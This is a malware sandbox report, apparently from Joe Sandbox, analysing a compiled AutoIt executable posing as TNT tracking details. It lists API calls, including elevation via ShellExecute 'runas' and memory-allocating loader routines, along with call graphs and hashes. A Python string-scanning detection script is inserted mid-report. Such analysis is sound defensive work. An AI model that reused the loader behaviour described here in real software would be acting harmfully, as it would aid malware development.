409fd2 88554 42a3f5 88499->88554 88504->88487 88508->88487 88518 4115d7 52 API calls 88511->88518 88515->88487 88516 42a42f 88888 45e737 90 API calls 3 library calls 88516->88888 88518->88469 88523 408f40 VariantClear 88520->88523 88526 4299e2 88523->88526 88524->87438 88877 410c60 VariantClear ctype 88526->88877 88531->88487 88533 44a801 52 API calls 88533->88557 88536->88482 88537 402780 52 API calls 88537->88557 88541 40a780 199 API calls 88541->88557 88542 408e80 VariantClear 88542->88557 88544 401980 53 API calls 88544->88557 88550 41130a 51 API calls __cinit 88550->88557 88551 4115d7 52 API calls 88551->88557 88557->88469 88557->88499 88557->88516 88557->88533 88557->88537 88557->88541 88557->88542 88557->88544 88557->88550 88557->88551 88557->88554 88558 409c95 88557->88558 88885 45f508 52 API calls 88557->88885 88886 403e10 53 API calls 88557->88886 88558->87438 88590 40a650 ctype 88590->87438 88594->87438 88595->87388 88596->87393 88597->87438 88598->87438 88599->87438 88600->87438 88601->87445 88602->87445 88603->87445 88604->87445 88605->87445 88606->87445 88607->87445 88608->87445 88609->87445 88610->87438 88611->87385 88615->88353 88622->88399 88623->88402 88624->88419 88625->88420 88626->88407 88628 408e80 VariantClear 88627->88628 88636 47fb02 88628->88636 88631 47fc59 88632 40a780 199 API calls 88631->88632 88635 47fc6a 88632->88635 88633 47fc2b 88637 408f40 VariantClear 88633->88637 88635->88633 88639 47fc7d 88635->88639 88640 47fc8c 88635->88640 88636->88631 88636->88633 88641 408f40 VariantClear 88636->88641 88650 47fcd4 88636->88650 88654 408e80 VariantClear 88636->88654 88668 47fc1d 88636->88668 88684 475a67 88636->88684 88712 47b291 88636->88712 88723 46fe32 VariantClear 88636->88723 88638 47fc33 88637->88638 88642 408f40 VariantClear 88638->88642 88726 45e737 90 API calls 3 library calls 88639->88726 88644 40ba10 52 API calls 88640->88644 88641->88636 88645 47fc3b 88642->88645 88647 47fc98 88644->88647 88646 408f40 VariantClear 88645->88646 
88648 47fc43 88646->88648 88727 47b2f4 144 API calls 88647->88727 88725 410c60 VariantClear ctype 88648->88725 88656 408f40 VariantClear 88650->88656 88652 47fca7 88654->88636 88658 47fcdc 88656->88658 88660 408f40 VariantClear 88658->88660 88662 47fce4 88660->88662 88664 408f40 VariantClear 88662->88664 88666 47fcec 88664->88666 88724 45e538 90 API calls 3 library calls 88668->88724 88673->88425 88674->88453 88675->88425 88676->88455 88677->88425 88678->88455 88679->88439 88680->88455 88682->88455 88683->88434 88685 475ae5 88684->88685 88688 475ac5 88684->88688 88730 45e737 90 API calls 3 library calls 88685->88730 88687 475afe 88689 408f40 VariantClear 88687->88689 88688->88685 88690 475b42 88688->88690 88691 402780 52 API calls 88688->88691 88694 475b06 88689->88694 88692 402780 52 API calls 88690->88692 88691->88688 88703 475b60 88692->88703 88693 475c7c 88695 408f40 VariantClear 88693->88695 88694->88636 88696 40c2c0 52 API calls 88696->88703 88697 40a780 199 API calls 88697->88703 88699 475cc7 88700 408f40 VariantClear 88699->88700 88705 475ca8 88700->88705 88701 40ba10 52 API calls 88701->88703 88702 475cd5 88732 45e737 90 API calls 3 library calls 88702->88732 88703->88693 88703->88696 88703->88697 88703->88699 88703->88701 88703->88702 88704 408f40 VariantClear 88703->88704 88709 475ca0 88703->88709 88731 40c4e0 199 API calls 88703->88731 88704->88703 88705->88636 88711 408f40 VariantClear 88709->88711 88711->88705 88713 47b2e7 88712->88713 88714 47b2a5 88712->88714 88713->88636 88733 40e710 88714->88733 88723->88636 88724->88633 88726->88633 88727->88652 88730->88687 88731->88703 88734 408f40 VariantClear 88733->88734 88735 40e71b 88734->88735 88736 4115d7 52 API calls 88735->88736 88737 40e729 88736->88737 88873->88465 88875->88481 88876->88487 88877->88590 88878->88487 88879->88501 88882->88495 88883->88497 88885->88557 88886->88557 88888->88536 88900->88536 88901->88485 88902 42d154 88906 480a8d 88902->88906 88904 42d161 88905 480a8d 199 API calls 
88904->88905 88905->88904 88907 480ae4 88906->88907 88908 480b26 88906->88908 88910 480aeb 88907->88910 88911 480b15 88907->88911 88909 40bc70 52 API calls 88908->88909 88933 480b2e 88909->88933 88913 480aee 88910->88913 88914 480b04 88910->88914 88939 4805bf 199 API calls 88911->88939 88913->88908 88916 480af3 88913->88916 88938 47fea2 199 API calls __itow_s 88914->88938 88937 47f135 199 API calls 88916->88937 88917 40e0a0 52 API calls 88917->88933 88920 408f40 VariantClear 88922 481156 88920->88922 88921 480aff 88921->88920 88923 408f40 VariantClear 88922->88923 88924 48115e 88923->88924 88924->88904 88925 480ff5 88945 45e737 90 API calls 3 library calls 88925->88945 88926 40e710 53 API calls 88926->88933 88927 401980 53 API calls 88927->88933 88929 40c2c0 52 API calls 88929->88933 88930 40a780 199 API calls 88930->88933 88932 408e80 VariantClear 88932->88933 88933->88917 88933->88921 88933->88925 88933->88926 88933->88927 88933->88929 88933->88930 88933->88932 88940 45377f 52 API calls 88933->88940 88941 45e951 53 API calls 88933->88941 88942 40e830 53 API calls 88933->88942 88943 47925f 53 API calls 88933->88943 88944 47fcff 199 API calls 88933->88944 88937->88921 88938->88921 88939->88921 88940->88933 88941->88933 88942->88933 88943->88933 88944->88933 88945->88921 88946 3f3c1cb 88947 3f3c1d2 88946->88947 88948 3f3c270 88947->88948 88949 3f3c1da 88947->88949 88966 3f3cb20 9 API calls 88948->88966 88953 3f3be80 88949->88953 88952 3f3c257 88954 3f39870 GetPEB 88953->88954 88955 3f3bf1f 88954->88955 88958 3f3bf79 VirtualAlloc 88955->88958 88960 3f3bf5d 88955->88960 88964 3f3c080 CloseHandle 88955->88964 88965 3f3c090 VirtualFree 88955->88965 88967 3f3cd90 GetPEB 88955->88967 88957 3f3bf50 CreateFileW 88957->88955 88957->88960 88959 3f3bf9a ReadFile 88958->88959 88958->88960 88959->88960 88963 3f3bfb8 VirtualAlloc 88959->88963 88961 3f3c17a 88960->88961 88962 3f3c16c VirtualFree 88960->88962 88961->88952 88962->88961 88963->88955 88963->88960 88964->88955 
88965->88955 88966->88952 88968 3f3cdba 88967->88968 88968->88957 88969 42b14b 88976 40bc10 88969->88976 88971 42b159 88972 4096a0 330 API calls 88971->88972 88973 42b177 88972->88973 88987 44b92d VariantClear 88973->88987 88975 42bc5b 88977 40bc24 88976->88977 88978 40bc17 88976->88978 88980 40bc2a 88977->88980 88981 40bc3c 88977->88981 88979 408e80 VariantClear 88978->88979 88983 40bc1f 88979->88983 88984 408e80 VariantClear 88980->88984 88982 4115d7 52 API calls 88981->88982 88986 40bc43 88982->88986 88983->88971 88985 40bc33 88984->88985 88985->88971 88986->88971 88987->88975 88988 425b2b 88993 40f000 88988->88993 88992 425b3a 88994 4115d7 52 API calls 88993->88994 88995 40f007 88994->88995 88996 4276ea 88995->88996 89002 40f030 88995->89002 89001 41130a 51 API calls __cinit 89001->88992 89003 40f039 89002->89003 89004 40f01a 89002->89004 89032 41130a 51 API calls __cinit 89003->89032 89006 40e500 89004->89006 89007 40bc70 52 API calls 89006->89007 89008 40e515 GetVersionExW 89007->89008 89009 402160 52 API calls 89008->89009 89010 40e557 89009->89010 89033 40e660 89010->89033 89016 427674 89019 4276c6 GetSystemInfo 89016->89019 89018 40e5cd GetCurrentProcess 89054 40ef20 LoadLibraryA GetProcAddress 89018->89054 89020 4276d5 GetSystemInfo 89019->89020 89024 40e5e0 89024->89020 89047 40efd0 89024->89047 89025 40e629 89051 40ef90 89025->89051 89028 40e641 FreeLibrary 89029 40e644 89028->89029 89030 40e653 FreeLibrary 89029->89030 89031 40e656 89029->89031 89030->89031 89031->89001 89032->89004 89034 40e667 89033->89034 89035 42761d 89034->89035 89036 40c600 52 API calls 89034->89036 89037 40e55c 89036->89037 89038 40e680 89037->89038 89039 40e687 89038->89039 89040 427616 89039->89040 89041 40c600 52 API calls 89039->89041 89042 40e566 89041->89042 89042->89016 89043 40ef60 89042->89043 89044 40e5c8 89043->89044 89045 40ef66 LoadLibraryA 89043->89045 89044->89018 89044->89024 89045->89044 89046 40ef77 GetProcAddress 89045->89046 89046->89044 89048 40e620 
89047->89048 89049 40efd6 LoadLibraryA 89047->89049 89048->89019 89048->89025 89049->89048 89050 40efe7 GetProcAddress 89049->89050 89050->89048 89055 40efb0 LoadLibraryA GetProcAddress 89051->89055 89053 40e632 GetNativeSystemInfo 89053->89028 89053->89029 89054->89024 89055->89053 89056 425b5e 89061 40c7f0 89056->89061 89060 425b6d 89096 40db10 52 API calls 89061->89096 89063 40c82a 89097 410ab0 6 API calls 89063->89097 89065 40c86d 89066 40bc70 52 API calls 89065->89066 89067 40c877 89066->89067 89068 40bc70 52 API calls 89067->89068 89069 40c881 89068->89069 89070 40bc70 52 API calls 89069->89070 89071 40c88b 89070->89071 89072 40bc70 52 API calls 89071->89072 89073 40c8d1 89072->89073 89074 40bc70 52 API calls 89073->89074 89075 40c991 89074->89075 89098 40d2c0 52 API calls 89075->89098 89077 40c99b 89099 40d0d0 53 API calls 89077->89099 89079 40c9c1 89080 40bc70 52 API calls 89079->89080 89081 40c9cb 89080->89081 89100 40e310 53 API calls 89081->89100 89083 40ca28 89084 408f40 VariantClear 89083->89084 89085 40ca30 89084->89085 89086 408f40 VariantClear 89085->89086 89087 40ca38 GetStdHandle 89086->89087 89088 429630 89087->89088 89089 40ca87 89087->89089 89088->89089 89090 429639 89088->89090 89095 41130a 51 API calls __cinit 89089->89095 89101 4432c0 57 API calls 89090->89101 89092 429641 89102 44b6ab CreateThread 89092->89102 89094 42964f CloseHandle 89094->89089 89095->89060 89096->89063 89097->89065 89098->89077 89099->89079 89100->89083 89101->89092 89102->89094 89103 44b5cb 58 API calls 89102->89103 89104 425b6f 89109 40dc90 89104->89109 89108 425b7e 89110 40bc70 52 API calls 89109->89110 89111 40dd03 89110->89111 89117 40f210 89111->89117 89114 40dd96 89115 40ddb7 89114->89115 89120 40dc00 52 API calls 2 library calls 89114->89120 89116 41130a 51 API calls __cinit 89115->89116 89116->89108 89121 40f250 RegOpenKeyExW 89117->89121 89119 40f230 89119->89114 89120->89114 89122 425e17 89121->89122 89123 40f275 RegQueryValueExW 89121->89123 89122->89119 
89124 40f2c3 RegCloseKey 89123->89124 89125 40f298 89123->89125 89124->89119 89126 40f2a9 RegCloseKey 89125->89126 89127 425e1d 89125->89127 89126->89119
                                      APIs
                                      • _wcslen.LIBCMT ref: 004096C1
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0040970C
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                      • _memmove.LIBCMT ref: 00409D96
                                      • _memmove.LIBCMT ref: 0040A6C4
                                      • _memmove.LIBCMT ref: 004297E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                      • String ID:
                                      • API String ID: 2383988440-0
                                      • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                      • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                      • String ID: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                      • API String ID: 2495805114-4170455280
                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
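The API and string list for this start-up routine is enough to fingerprint the AutoIt host stub statically: the MessageBoxA text is stored as an ANSI C string, while the "AutoIt v3" window class (CreateWindowExW), the "runas" verb (ShellExecuteW) and the "Software\AutoIt v3\AutoIt" subkey (RegOpenKeyExW, listed further down) are stored as UTF-16LE. The script below is an added triage example, not part of the Joe Sandbox report or of AutoIt; the indicator labels, the verdict rules and the sample byte buffer are this example's own constructions, and the "runas" verb is only reported once the stub itself is confirmed because that string is common in unrelated binaries.

```python
"""Static string triage for a compiled-AutoIt stub (added example)."""
from __future__ import annotations

import sys

# Indicator strings taken from the report's API/string lists for this stub.
# The indicator names are this example's own labels, not report fields.
INDICATORS = {
    "autoit_av_notice": ("This is a compiled AutoIt script. AV researchers please "
                         "email avsupport@autoitscript.com for support."),
    "autoit_window_class": "AutoIt v3",                      # CreateWindowExW class/title
    "autoit_registry_path": "Software\\AutoIt v3\\AutoIt",   # RegOpenKeyExW subkey
    "autoit_execute_script_switch": "/AutoIt3ExecuteScript",  # command-line switch
    "shellexecute_runas_verb": "runas",                      # ShellExecuteW verb
}


def _needles(text: str) -> dict[str, bytes]:
    """NUL-terminated ANSI and UTF-16LE forms. The A/W suffix of the calling API
    decides which one the binary really stores, so both are searched."""
    return {
        "ansi": text.encode("latin-1") + b"\x00",
        "utf16": text.encode("utf-16-le") + b"\x00\x00",
    }


def _find_all(buf: bytes, needle: bytes):
    pos = buf.find(needle)
    while pos != -1:
        yield pos
        pos = buf.find(needle, pos + 1)


def scan(buf: bytes) -> dict[str, list[int]]:
    """Map every indicator present in buf to the sorted offsets where it occurs."""
    hits: dict[str, list[int]] = {}
    for name, text in INDICATORS.items():
        offsets = [off for needle in _needles(text).values()
                   for off in _find_all(buf, needle)]
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def classify(hits: dict[str, list[int]]) -> list[str]:
    """Tag the buffer. The AV notice alone identifies the stub; without it, both
    the window class and the registry path are required so that no single
    generic string decides the verdict. 'runas' only counts once the stub is
    confirmed, because the verb appears in many unrelated binaries."""
    is_autoit = ("autoit_av_notice" in hits
                 or {"autoit_window_class", "autoit_registry_path"}.issubset(hits))
    tags: list[str] = []
    if is_autoit:
        tags.append("compiled-autoit")
        if "shellexecute_runas_verb" in hits:
            tags.append("requests-elevation")
        if "autoit_execute_script_switch" in hits:
            tags.append("accepts-external-script")
    return tags


def build_sample() -> bytes:
    """Constructed stand-in for the stub's read-only data: the indicators laid out
    as C strings with filler between them (not bytes from the real sample)."""
    def a(s: str) -> bytes:
        return s.encode("latin-1") + b"\x00"

    def w(s: str) -> bytes:
        return s.encode("utf-16-le") + b"\x00\x00"

    return (b"\x90" * 16
            + a(INDICATORS["autoit_av_notice"]) + b"\x00" * 7
            + w("AutoIt v3") + b"\xcc" * 3
            + w("runas")
            + w("Software\\AutoIt v3\\AutoIt")
            + w("/AutoIt3ExecuteScript") + b"\x00" * 5)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    found = scan(data)
    for name, offs in found.items():
        print(f"{name}: {', '.join(hex(o) for o in offs)}")
    print("tags:", classify(found) or ["none"])
```

Run it with a file path to scan a real PE, or without arguments to scan the constructed buffer. Searching the NUL-terminated form of each string keeps "runas" from matching inside longer identifiers, which is the main false-positive source for short verbs.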

                                      Control-flow Graph

                                      control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1532 46cc96-46cca1 1528->1532 1538 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1538 1529->1532 1533 46cc62-46cc8b call 43119b 1529->1533 1534 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1534 1532->1534 1550 46cc8e-46cc90 1533->1550 1552 46cdf4 1538->1552 1553 46ccfd-46cd1f call 402160 call 431a2b 1538->1553 1550->1532 1554 46ceb7-46cef0 call 468070 call 402250 * 3 1550->1554 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1552->1555 1568 46cd35-46cd41 call 465177 1553->1568 1569 46cd21-46cd33 1553->1569 1555->1532 1564 46ce50-46ce55 1555->1564 1564->1532 1567 46ce5b-46ce62 1564->1567 1571 46ce64-46ce8b CoSetProxyBlanket 1567->1571 1572 46ce8d-46ce9e 1567->1572 1580 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1568->1580 1573 46cda5-46cdaa 1569->1573 1571->1572 1572->1550 1577 46cea4-46ceb2 1572->1577 1578 46cdac-46cdbb call 4111c1 1573->1578 1579 46cdbd-46cdc0 1573->1579 1577->1534 1584 46cdc3-46cdf2 1578->1584 1579->1584 1580->1573 1584->1555
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                      • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                      • _wcslen.LIBCMT ref: 0046CDB0
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 440038798-2785691316
                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                      Control-flow Graph

                                      control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2018 40e5ec-40e60c 2000->2018 2019 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2019 2020 4276c6-4276ca GetSystemInfo 2001->2020 2002->2001 2009 427698-4276a8 2002->2009 2003->2001 2011 427636-427640 2004->2011 2012 42762b-427631 2004->2012 2007 40e5a5-40e5ae 2005->2007 2008 427654-427657 2005->2008 2014 40e5b4 2007->2014 2015 427645-42764f 2007->2015 2008->2000 2013 42765d-42766f 2008->2013 2016 4276b0 2009->2016 2017 4276aa-4276ae 2009->2017 2011->2000 2012->2000 2013->2000 2014->2000 2015->2000 2016->2001 2017->2001 2021 40e612-40e623 call 40efd0 2018->2021 2022 4276d5-4276df GetSystemInfo 2018->2022 2019->2018 2029 40e5e8 2019->2029 2020->2022 2021->2020 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2021->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2018 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                      • String ID: 0SH
                                      • API String ID: 3363477735-851180471
                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                      APIs
                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
